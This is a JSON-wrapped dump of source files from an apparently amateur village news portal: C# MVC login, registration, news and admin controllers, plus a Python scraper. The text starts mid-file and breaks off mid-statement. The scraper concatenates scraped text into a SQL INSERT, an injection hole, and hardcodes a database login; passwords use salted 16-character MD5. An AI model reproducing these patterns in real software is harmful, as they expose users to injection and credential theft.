User/UserInfoMod\n public ActionResult Index()\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户的资料\");\n }\n return View(ui);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Index(string Nickname,string password, string password1,string password2,string Hobby,string Gender,string Description)\n {\n if (string.IsNullOrEmpty(Nickname)|| string.IsNullOrEmpty(password) || string.IsNullOrEmpty(password1) || string.IsNullOrEmpty(password2) || string.IsNullOrEmpty(Hobby) || string.IsNullOrEmpty(Gender) ||string.IsNullOrEmpty(Description))\n {\n return Json(new { status = \"n\", info = \"请填写完整的修改信息\" });\n }\n if (password1!=password2)\n {\n return Json(new { status = \"n\", info = \"两次输入的新密码不一致\" });\n }\n if (password == password1)\n {\n return Json(new 
{ status = \"n\", info = \"新密码不能与旧密码相同\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Json(new { status = \"n\", info = \"该用户不存在\" });\n }\n password += \"_GDKQ\";\n password = MD5.MD5Encrypt16(password);\n if (u.Password.ToLower() != password.ToLower())\n {\n return Json(new { status = \"n\", info = \"原密码错误,请重新输入\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Json(new { status = \"n\", info = \"找不到该用户资料\" });\n }\n password1 += \"_GDKQ\";\n password1 = MD5.MD5Encrypt16(password1);\n u.Password = password1;\n ui.Nickname = Nickname;\n ui.Hobby = Hobby;\n ui.Gender = Gender;\n ui.Description = Description;\n u.Nickname = Nickname;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"修改成功\", NextUrl = \"/User/Home/Index\" });\n }\n\n\n \n }\n}" }, { "alpha_fraction": 0.46735548973083496, "alphanum_fraction": 0.4732341766357422, "avg_line_length": 35.9309196472168, "blob_id": "c068815ff661de08e0c5c929e2eabd250869b85c", "content_id": "c820674c809281ef13e6dd927c2afa3d1dad7077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 12109, "license_type": "no_license", "max_line_length": 155, "num_lines": 304, "path": "/GDKQ.Web/Controllers/LoginController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Drawing;\nusing System.Drawing.Drawing2D;\nusing System.Drawing.Imaging;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Common;\nusing System.Text.RegularExpressions;\n\nnamespace GDKQ.Web.Controllers\n{\n public class LoginController : Controller\n {\n // GET: Login & Register\n public ActionResult Index()\n {\n Session.Abandon();\n return View();\n }\n\n #region\n public ActionResult SecurityCode()\n {\n string oldcode = TempData[\"SecurityCode\"] as string;\n string code = CreateRandomCode(4); //验证码的字符为4个\n TempData[\"SecurityCode\"] = code; //验证码存放在TempData中\n return File(CreateValidateGraphic(code), \"image/Jpeg\");\n }\n\n /// <summary>\n /// 生成随机的字符串\n /// </summary>\n /// <param name=\"codeCount\"></param>\n /// <returns></returns>\n public string CreateRandomCode(int codeCount)\n {\n string allChar = \"0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,a,b,c,d,e,f,g,h,i,g,k,l,m,n,o,p,q,r,F,G,H,I,G,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,s,t,u,v,w,x,y,z\";\n string[] allCharArray = allChar.Split(',');\n string randomCode = \"\";\n int temp = -1;\n Random rand = new Random();\n for (int i = 0; i < codeCount; i++)\n {\n if (temp != -1)\n {\n rand = new Random(i * temp * ((int)DateTime.Now.Ticks));\n }\n int t = rand.Next(35);\n if (temp == t)\n {\n return CreateRandomCode(codeCount);\n }\n temp = t;\n randomCode += allCharArray[t];\n }\n return randomCode;\n }\n\n /// <summary>\n /// 创建验证码图片\n /// </summary>\n /// <param name=\"validateCode\">验证码字符串</param>\n /// <returns>验证码图片</returns>\n public byte[] CreateValidateGraphic(string validateCode)\n {\n Bitmap image = new Bitmap((int)Math.Ceiling(validateCode.Length * 16.0), 27);\n Graphics g = Graphics.FromImage(image);\n try\n {\n //生成随机生成器\n Random random = new Random();\n //清空图片背景色\n g.Clear(Color.White);\n //画图片的干扰线\n for (int i = 0; i < 25; i++)\n {\n int x1 = random.Next(image.Width);\n int x2 = random.Next(image.Width);\n int y1 = random.Next(image.Height);\n int y2 = random.Next(image.Height);\n 
g.DrawLine(new Pen(Color.Silver), x1, y1, x2, y2);//fixed: Graphics.DrawLine expects (x1, y1, x2, y2)\n                }\n                Font font = new Font(\"Arial\", 13, (FontStyle.Bold | FontStyle.Italic));\n                LinearGradientBrush brush = new LinearGradientBrush(new Rectangle(0, 0, image.Width, image.Height), Color.Blue, Color.DarkRed, 1.2f, true);\n                g.DrawString(validateCode, font, brush, 3, 2);\n\n                //画图片的前景干扰线\n                for (int i = 0; i < 100; i++)\n                {\n                    int x = random.Next(image.Width);\n                    int y = random.Next(image.Height);\n                    image.SetPixel(x, y, Color.FromArgb(random.Next()));\n                }\n                //画图片的边框线\n                g.DrawRectangle(new Pen(Color.Silver), 0, 0, image.Width - 1, image.Height - 1);\n\n                //保存图片数据\n                MemoryStream stream = new MemoryStream();\n                image.Save(stream, ImageFormat.Jpeg);\n\n                //输出图片流\n                return stream.ToArray();\n            }\n            finally\n            {\n                g.Dispose();\n                image.Dispose();\n            }\n        }\n        #endregion\n\n\n        /// <summary>\n        /// 登录验证\n        /// </summary>\n        /// <param name=\"username\">用户名</param>\n        /// <param name=\"password\">密码</param>\n        /// <param name=\"SecurityCode\">验证码</param>\n        /// <returns></returns>\n        [ValidateAntiForgeryToken()]\n        [HttpPost]\n        public ActionResult Admin(string username, string password, string SecurityCode)\n        {\n            if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n            {\n                return Json(new { status = \"n\", info = \"请输入验证码\" });\n            }\n            if (TempData[\"SecurityCode\"]==null)\n            {\n                return Content(\"出现错误了,重新登录试试\");\n            }\n            if ((SecurityCode.ToLower())!=((TempData[\"SecurityCode\"] as string).ToLower()))\n            {\n                return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n            }\n\n            if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n            }\n            password += \"_GDKQ\";\n            password = MD5.MD5Encrypt16(password);\n            Model.Admin a = new DAL.GDKQContext().Admin.SingleOrDefault(x => x.UserName == username && x.Password == password);\n            if (a == null)\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n            }\n            a.LastLoginIP = GetIPadress.GetHostAddress();\n            a.LastLoginTime = DateTime.Now;\n            Session[\"admin\"] = a;//创建Session\n            return Json(new { status = \"y\", info = \"登录成功\" ,NextUrl= \"/Adm1n/Home/Index\" });\n        }\n        //↑管理员\n        public ActionResult Villager(string username, string password, string SecurityCode)\n        {\n            if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n            {\n                return Json(new { status = \"n\", info = \"请输入验证码\" });\n            }\n            if (TempData[\"SecurityCode\"] == null)//guard added, mirroring Admin: TempData may have expired\n            {\n                return Content(\"出现错误了,重新登录试试\");\n            }\n            if ((SecurityCode.ToLower()) != ((TempData[\"SecurityCode\"] as string).ToLower()))\n            {\n                return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n            }\n\n            if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n            }\n            password += \"_GDKQ\";\n            password = MD5.MD5Encrypt16(password);\n            Model.Villager v = new DAL.GDKQContext().Villager.SingleOrDefault(x => x.UserName == username && x.Password == password);\n            if (v == null)\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n            }\n            if (v.Enabled!=true)\n            {\n                return Json(new { status = \"n\", info = \"账号被冻结,请联系管理员\" });\n            }\n            v.LastLoginIP = GetIPadress.GetHostAddress();\n            v.LastLoginTime = DateTime.Now;\n            Session[\"villager\"] = v;//创建Session\n            return Json(new { status = \"y\", info = \"登录成功\", NextUrl = \"/Home/Index\" });\n        }\n        //↑村民\n        public new ActionResult User(string username, string password, string SecurityCode)\n        {\n            if (string.IsNullOrEmpty(SecurityCode))//验证验证码校验\n            {\n                return Json(new { status = \"n\", info = \"请输入验证码\" });\n            }\n            if (TempData[\"SecurityCode\"] == null)//guard added, mirroring Admin: TempData may have expired\n            {\n                return Content(\"出现错误了,重新登录试试\");\n            }\n            if ((SecurityCode.ToLower()) != ((TempData[\"SecurityCode\"] as string).ToLower()))\n            {\n                return Json(new { status = \"n\", info = \"验证码错误,请重新输入\" });\n            }\n\n            if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))//用户名和密码校验\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码不能为空\" });\n            }\n            password += \"_GDKQ\";\n            password=MD5.MD5Encrypt16(password);\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.User u = dal.User.SingleOrDefault(x => x.UserName == username && x.Password == password);\n            if (u == null)\n            {\n                return Json(new { status = \"n\", info = \"用户名或密码错误\" });\n            }\n            if (u.Enabled != true)\n            {\n                return Json(new { status = \"n\", info = \"账号被冻结,请联系管理员\" });\n            }\n            u.LastLoginIP = GetIPadress.GetHostAddress();\n            u.LastLoginTime = DateTime.Now;\n            Session[\"user\"] = u;//创建Session\n            return Json(new { status = \"y\", info = \"登录成功\", NextUrl = \"/User/Home\" });\n        }\n        //↑用户\n\n\n        //用户注册\n        public ActionResult Register(string usernamer, string passwordr, string passwordr2, string mail)\n        {\n            //用户名和密码校验\n            if (string.IsNullOrEmpty(usernamer) || string.IsNullOrEmpty(passwordr)||string.IsNullOrEmpty(passwordr2)||string.IsNullOrEmpty(mail))\n            {\n                return Json(new { status = \"n\", info = \"请填写完整的注册信息\" });\n            }\n\n            if (passwordr2 != passwordr)\n            {\n                return Json(new { status = \"n\", info = \"两次输入的密码不一致,请重新输入\" });\n            }\n\n            Regex Verification = new Regex(\"^[a-zA-Z]\\\\w{5,15}$\");\n            if (!Verification.IsMatch(usernamer))\n            {\n                return Json(new { status = \"n\", info = \"请注意用户名格式\" });\n            }\n            Verification = new Regex(\"\\\\w{5,15}$\");\n            if (!Verification.IsMatch(passwordr))\n            {\n                return Json(new { status = \"n\", info = \"请注意密码格式\" });\n            }\n            \n            Verification = new Regex(\"^\\\\s*([A-Za-z0-9_-]+(\\\\.\\\\w+)*@(\\\\w+\\\\.)+\\\\w{2,5})\\\\s*$\");\n            if (!Verification.IsMatch(mail))\n            {\n                return Json(new { status = \"n\", info = \"请输入正确的邮箱格式\" });\n            }\n\n            //验证用户名是否已经注册\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.User u = dal.User.SingleOrDefault(x => x.UserName == usernamer);//fixed: duplicate check must compare the username, not the password\n            if (u!=null)\n            {\n                return Json(new { status = \"n\", info = \"该用户名已经被注册了,请更换用户名\" });\n            }\n\n            //数据库添加用户\n            passwordr += \"_GDKQ\";\n            passwordr = MD5.MD5Encrypt16(passwordr);\n            dal.User.Add(new Model.User()\n            {\n                UserName = usernamer,\n                Password = passwordr,\n                CreatTime = DateTime.Now,\n                LastLoginTime = DateTime.Now,\n                LastLoginIP = GetIPadress.GetHostAddress(),\n                Enabled = true,\n                IsDeleted = true,\n            });\n            dal.SaveChanges();\n            Model.User uu = dal.User.SingleOrDefault(x => x.UserName == usernamer && x.Password == passwordr);\n            if (uu==null)\n            {\n                return Json(new { status = \"n\", info = \"bug\" });\n            }\n\n            dal.UserInfo.Add(new Model.UserInfo()\n            {\n                UserID = uu.ID,\n                Nickname = \"萌新\"+uu.ID,\n                Hobby = \"暂无\",\n                Gender = \"男\",\n                Description = \"这家伙很懒,啥都没写\",\n                Photo = \"/Content/assets/img/toux1.jpg\",\n                RealName = \"保密\",\n            });\n            uu.Nickname = \"萌新\" + uu.ID;//fixed: keep User.Nickname in sync with the UserInfo nickname above (was \"+=\" on a null string)\n            dal.SaveChanges();\n            //创建session\n            Session[\"user\"] = uu;\n            return Json(new { status = \"y\", info = \"注册成功\", NextUrl = \"/User/Home/Index\" });\n        }\n    }\n    \n}\n" }, { "alpha_fraction": 0.5764914155006409, "alphanum_fraction": 0.6072061657905579, "avg_line_length": 40.29268264770508, "blob_id": "750a4ea9b794f02a9087043a109a4202f4234561", "content_id": "83859b2b9cb5ef8cc9116e6f502c893e06cb7ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 222, "num_lines": 41, "path": "/Python爬虫文件/main.py", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "#coding='utf-8'\nimport requests\nimport pyodbc\nimport re\nfrom bs4 import BeautifulSoup\n\nurl='http://www.zjtz.gov.cn/col/col14/index.html'\nheaders = {'user-agent': 'my-app/0.0.1'}\nres=requests.get(url,timeout=500,headers=headers)\nres.encoding='utf-8'\ntemp=res.text.replace('&lt;','<').replace('&gt;','>').replace('&amp;','&').replace('![CDATA[','').replace(']]','').replace('&quot;','\"').replace('&apos;',\"'\")\nsoup=BeautifulSoup(temp,'html.parser')\ncnxn =pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=GDKQ_DB;UID=sa;PWD=123456')\ncursor = cnxn.cursor()\n\n\nurls='http://www.zjtz.gov.cn'\nfor i in soup.select('#6184')[0].find_all(\"a\")[1:]:\n    realurl=urls+i.get(\"href\")\n    print(realurl)\n    res2 = requests.get(realurl)\n    res2.encoding = 'utf-8'\n    soup2 = BeautifulSoup(res2.text, 'html.parser')\n    # print('标题:' + soup2.select('#title')[0].text.strip() + '\\n' + '日期和来源:' + soup2.find(style=\"font-size:12px; color:#999; line-height:24px; padding-top:10px;\").text.strip() + '\\n' +'正文内容:'+ soup2.select('#zoom')[0].text)\n    # print(\"---------------------------------\")\n\n\t\n    #print(TurlBody)\n    #tempstring='insert into dbo.Py_Spider(Title, Body) values (%s,%s)'\n    #tempstring.format(Title,TurlBody)\n    #temp=re.findall('%S*',)\n    #print(temp)\n    #print(soup2.select('#zoom')[0])\n    #sfjgkl=str(soup2.select('#zoom')[0].content)\n    var1=\"台州政府网 \" #Author\n    var2=\"001\"#bh\n    var3=\"公示公告\" #CaName; added: var3 was referenced below but never defined (value assumed from the category comment further down)\n    sadf=\"insert into dbo.News(Title, Body,Author,bh,CaName) values (\"+\"'\"+soup2.select('#title')[0].text.strip()+\"'\"+\",\"+\"'\"+soup2.select('#zoom')[0].text.strip()+\"'\"+\",\"+\"'\"+var1+\"'\"+\",\"+\"'\"+var2+\"'\"+\",\"+\"'\"+var3+\"'\"+\")\"\n    #print(sadf)\n    #公示公告\n    cursor.execute(sadf)\n    cnxn.commit()\n" }, { "alpha_fraction": 0.4896385669708252, "alphanum_fraction": 0.4934939742088318, "avg_line_length": 31.4375, "blob_id": "50f6842930c8ac5ac2886e3c82df2f55dcf6abdd", "content_id": "3516d50a8d4d9a7fd03b79a47827dca60050c0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2179, "license_type": "no_license", "max_line_length": 123, "num_lines": 64, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/AffairController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n    public class AffairController : Controller\n    {\n        // GET: Livelihood/Affair\n        public ActionResult List(string bh, int pageindex = 1)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n            if (ca == null)\n            {\n                return Content(\"没有该分类的新闻!\");\n            }\n            int pagesize = 10;//每页显示条数\n            int total = 0;//总数\n            total = dal.News.Count(x => x.bh == ca.bh && x.IsDeleted == true);\n            if (total < 1)\n            {\n                return Content(\"数据库中没有该新闻!\");\n            }\n            List<Model.News> list0 = dal.News.Where(\n                x => x.bh == ca.bh && x.IsDeleted == true).OrderByDescending(a=>a.CreateTime).Take(6).ToList<Model.News>();\n            PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n            ViewBag.Title = ca.CaName;\n            ViewBag.bh = ca.bh;\n\n            return View(list);\n        }\n\n        public ActionResult Advice(string Body)\n        {\n            string FromName;\n            if (string.IsNullOrEmpty(Body))\n            {\n                return Json(new { status = \"n\", info = \"请填写建议!\" });\n            }\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.User u = Session[\"user\"] as Model.User;\n            if (u == 
null)\n {\n FromName = \"匿名\";\n }\n else {\n FromName = u.Nickname;\n }\n dal.Advice.Add(new Model.Advice()\n {\n Body = Body,\n CreateTime = DateTime.Now,\n IsRead = true,\n From_Name=FromName\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"感谢您的建议,我们会尽快改进的!\" });\n }\n }\n}" }, { "alpha_fraction": 0.4620586037635803, "alphanum_fraction": 0.46675431728363037, "avg_line_length": 27.475934982299805, "blob_id": "ffafc905a365a9bf8e4948910264e39839b0c45d", "content_id": "91ec1132c675a3939ee1adb79e982ce237b9d455", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5580, "license_type": "no_license", "max_line_length": 165, "num_lines": 187, "path": "/GDKQ.Web/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Controllers\n{\n /// <summary>\n /// 新闻控制器\n /// </summary>\n public class NewsController : Controller\n {\n /// <summary>\n /// 逆旅千古\n /// </summary>\n /// <param name=\"bh\">11</param>\n /// <returns></returns>\n public ActionResult OnePage(string bh)\n {\n Model.News n = new DAL.GDKQContext().News.SingleOrDefault(a => a.bh == bh);\n if (n==null)\n {\n return Content(\"暂无该新闻\");\n }\n ViewBag.Title = n.CaName;\n return View(n); \n }\n\n /// <summary>\n /// 先哲今贤\n /// </summary>\n /// <param name=\"bh\">12</param>\n /// <returns></returns>\n public ActionResult List(string bh,int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.News.Count(n=>n.bh == bh);\n if (total <1)\n {\n return Content(\"数据库中没有相关新闻\");\n }\n List<Model.News> list0 = dal.News.Where(n => n.bh == bh).OrderBy(n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n \n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n return View(list);\n }\n\n\n /// <summary>\n /// 文化遗产保护\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult OnePage1(string bh, int? 
id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id && x.IsDeleted == true);\n if (n==null)\n {\n return Content(\"数据库中没有该新闻\");\n }\n ViewBag.Title = n.CaName;\n return View(n);\n }\n\n\n public ActionResult List1(string bh, int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.News.Count(n => n.bh == bh);\n if (total < 1)\n {\n return Content(\"数据库中没有相关新闻\");\n }\n List<Model.News> list0 = dal.News.Where(n => n.bh == bh).OrderBy(n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n return View(list);\n }\n /// <summary>\n /// 走进孔坵\n /// </summary>\n /// <returns></returns>\n public ActionResult KQDetail()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n \n return View();\n }\n\n\n\n /// <summary>\n /// 孔坵全景\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_qj()\n {\n return View();\n }\n\n /// <summary>\n /// 山明水秀\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_sm()\n {\n return View();\n }\n\n /// <summary>\n /// 守望瑰宝\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_sw()\n {\n return View();\n }\n\n /// <summary>\n /// 曲径通幽\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_qjty()\n {\n return View();\n }\n\n /// <summary>\n /// 众筹与活动(列表)\n /// </summary>\n /// <returns></returns>\n public ActionResult List_zc(string bh)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n List<Model.News> zc = dal.News.Where(x => x.bh == bh && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).Take(3).ToList<Model.News>();\n return View(zc);\n }\n\n /// <summary>\n /// 众筹活动(单页)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult OnePage_zc(string bh, int? 
id)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.News zc = dal.News.SingleOrDefault(x => x.bh == bh && x.ID == id);\n            if (zc==null)\n            {\n                return Content(\"数据库中没有该活动\");\n            }\n            ViewBag.Title=zc.Author;\n            return View(zc);\n        }\n\n        /// <summary>\n        /// 摄影比赛\n        /// </summary>\n        /// <returns></returns>\n        public ActionResult photo_contest()\n        {\n            //DAL.GDKQContext dal = new DAL.GDKQContext();\n            //List<Model.Photo> p = dal.Photo.OrderByDescending(x => x.CreateTime).Take(16).ToList<Model.Photo>();\n            //if (p==null)\n            //{\n            //    return Content(\"暂无比赛\");\n            //}\n            ViewBag.Title = \"摄影比赛\";\n            return View();\n        }\n\n\n        public ActionResult join_contest()\n        {\n            return View();\n        }\n    }\n}" }, { "alpha_fraction": 0.4355832636356354, "alphanum_fraction": 0.43929606676101685, "avg_line_length": 31.610170364379883, "blob_id": "90b04fa0ec89965fcb14efdbc04274a6f81bc128", "content_id": "cd7840bc3fd3bba30e462e2f38c4a5e880a4cd0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 14117, "license_type": "no_license", "max_line_length": 214, "num_lines": 413, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n    [Filter.AdminLoginFilter]\n    /// <summary>\n    /// 新闻控制器\n    /// </summary>\n    public class NewsController : Controller\n    {\n        /// <summary>\n        /// 单页新闻(读取)\n        /// </summary>\n        /// <param name=\"bh\"></param>\n        /// <returns></returns>\n        public ActionResult OnePage(string bh)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Category ca = dal.Category.SingleOrDefault(a => a.bh == bh);\n            if (ca == null)\n            {\n                return Content(\"没有该分类\");\n            }\n            Model.News n = dal.News.SingleOrDefault(a => a.bh == bh);//SingleOrDefault: Single() would throw before the null check when the page does not exist yet\n            if (n == null)\n            {\n                n = new Model.News()\n                {\n                    Title = ca.CaName,\n                    Body = ca.CaName + \"的内容\",\n                    Author = null,\n                    bh = ca.bh,\n                    CaName = ca.CaName,\n                    CreateTime = DateTime.Now,\n                    VisitNum = 0,\n                };\n                dal.News.Add(n);//add the new page once and persist it (the old code added a second, null entity and never saved)\n                dal.SaveChanges();\n            }\n            return View(n);\n        }\n\n\n        [ValidateAntiForgeryToken()]\n        [HttpPost]\n        [ValidateInput(false)]\n        //单页新闻(编辑)\n        public ActionResult OnePage(Model.News n)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.News n_indb = dal.News.SingleOrDefault(a => a.ID == n.ID);\n            if (n_indb == null)\n            {\n                return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n            }\n            n_indb.Title = n.Title;\n            n_indb.Body = n.Body;\n            n_indb.Url = n.Url;\n            dal.SaveChanges();\n            return Json(new { status = \"y\", info = \"更新成功\" });\n        }\n\n\n\n\n\n\n\n        /// <summary>\n        /// 列表新闻(读取)\n        /// </summary>\n        /// <param name=\"bh\">分类编号</param>\n        /// <param name=\"pageindex\">当前所在页面编号</param>\n        /// <returns></returns>\n        public ActionResult List(string bh, int pageindex = 1)\n        {\n            int pagesize = 10;//每页显示条数\n            int total = 0;//总数\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n            if (ca == null)//guard added: ca is dereferenced below\n            {\n                return Content(\"没有该分类\");\n            }\n            total = dal.News.Count(n => n.bh == bh && n.IsDeleted==true);\n            if (total < 1)\n            {\n                return Content(\"数据库中没有相关新闻\");\n            }\n            List<Model.News> list0 = dal.News.Where(n => n.bh == bh && n.IsDeleted == true).OrderBy(\n                n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n            PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n            ViewBag.Title = ca.CaName;\n            ViewBag.bh = ca.bh;\n            return 
View(list);\n }\n\n \n /// <summary>\n /// 列表新闻(添加)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult Add(string bh, int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n #region\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n if (ca == null)\n {\n return Content(\"没有该分类\");\n }\n Model.News n = new Model.News();\n #endregion//验证是否有该新闻分类\n ViewBag.Title = ca.CaName;\n if (id == null)\n {\n //添加\n n = new Model.News()\n {\n VisitNum = 0,\n CaName = ca.CaName,\n bh = ca.bh,\n CreateTime = DateTime.Now\n };\n }\n else\n {\n //编辑\n n = dal.News.SingleOrDefault(a => a.ID == id);\n if (n == null)\n {\n return Content(\"数据库中不存在该新闻\");\n }\n }\n return View(n);\n }\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n public ActionResult Add(Model.News n)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (n.ID == 0)\n {\n //添加\n dal.News.Add(new Model.News()\n {\n Author = n.Author,\n bh = n.bh,\n Body = n.Body,\n CaName = n.CaName,\n CreateTime = DateTime.Now,\n IsDeleted = true,\n Photo = n.Photo,\n Title = n.Title,\n VisitNum = 1,\n Url= \"https://\"+n.Url\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\" ,bh=n.bh});\n }\n else\n {\n //编辑\n Model.News n_indbb = dal.News.SingleOrDefault(a => a.ID == n.ID);\n if (n_indbb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n }\n n_indbb.Title = n.Title;\n n_indbb.Body = n.Body;\n n_indbb.Photo = n.Photo;\n n_indbb.Author = n.Author;\n n_indbb.Url = n.Url;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"编辑成功\",bh=n.bh });\n }\n }\n\n\n public ActionResult Delect(string bh,int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id);\n if (n==null)\n {\n return Content(\"没有该新闻\");\n }\n n.IsDeleted = false;\n dal.SaveChanges();\n return Redirect(\"/Adm1n/News/List?bh=\"+bh);\n }\n\n #region\n /// <summary>\n /// 建议列表\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult AdviceList(int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Advice.Count();\n if (total < 1)\n {\n return Content(\"暂无建议\");\n }\n List<Model.Advice> list0 = dal.Advice.Where(x=>x.IsRead==true).OrderByDescending(ad=>ad.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Advice>();\n PagedList<GDKQ.Model.Advice> list = new PagedList<Model.Advice>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"建议箱\";\n return View(list);\n }\n\n /// <summary>\n /// 删除建议\n /// </summary>\n /// <returns></returns>\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult DelectAdvice(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Advice ad = dal.Advice.SingleOrDefault(x => x.ID == id);\n if (ad == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n }\n ad.IsRead = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n #endregion\n //↑查看建议与删除\n\n\n\n /// <summary>\n /// 所有文章(列表)\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult ShowArticle(int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Article.Count(x => x.IsDeleted == true && x.Enable == true);\n if 
